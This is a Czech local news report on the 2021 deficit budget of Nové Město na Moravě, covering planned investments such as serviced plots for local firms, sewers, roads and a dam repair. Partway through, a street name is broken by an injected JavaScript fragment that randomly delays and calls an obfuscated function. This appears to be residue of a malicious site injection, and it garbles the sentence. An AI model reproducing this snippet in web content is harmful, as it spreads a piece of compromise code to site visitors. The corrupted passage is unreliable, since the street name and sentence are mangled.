Rainbow page separator

V Novém Městě připraví zasíťované parcely pro lokální firmy

Pondělí, 25. Leden 2021

Radnice Nové Město na Moravě

Nové Město na Moravě / Se schodkovým rozpočtem bude v letošním roce hospodařit novoměstská radnice. Příjmy mají dosáhnout 249 milionů korun a výdaje 295 milionů. Z toho je 89 milionů určeno na investice a dalších deset na větší opravy. Polovinu investic město uhradí z provozního přebytku, zbytek z úspor, případně může čerpat dvacetimilionový úvěr.
K nejvýznamnějším stavebním akcím bude patřit vybudování Centra služeb a řemesel, přičemž tento projekt má podpořit lokální firmy a nabídnout jim prostor k podnikání. Pokud se podaří získat státní dotaci, centrum vznikne v bývalém areálu podniku Agro Měřín, jenž město už dříve odkoupilo, a to úpravou a zasíťováním parcel, které poté budou nabídnuty k prodeji investorům. Na vybudování technické infrastruktury je vyčleněno patnáct milionů korun, na dalších dvanáct a půl vyjde příspěvek města na novostavbu vodovodu a kanalizace.
S více než pěti miliony je v rozpočtu počítáno coby příspěvkem na vybudování kanalizace v místní části města Hlinné, nový chodník v ulici Leandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andra Čecha vyjde na více než čtyři miliony. Rekonstrukce za 5,6 milionu korun včetně téměř dvoumilionového příspěvku na opravu tamní kanalizace se dočká ulice Drobného a v plánu je rovněž první etapa zvýšení bezpečnosti Masarykovy ulice, kde vznikne okružní křižovatka za bezmála šest milionů korun. Zejména kvůli hrozícím bleskovým povodním bude opravena hráz rybníka ve Slavkovicích, což má stát půldruhého milionu. Na 2,5 milionu je vyčísleno rozšíření katolického hřbitova a opravy za dva miliony korun se dočká také komunikace v Maršovicích.

ilustrační foto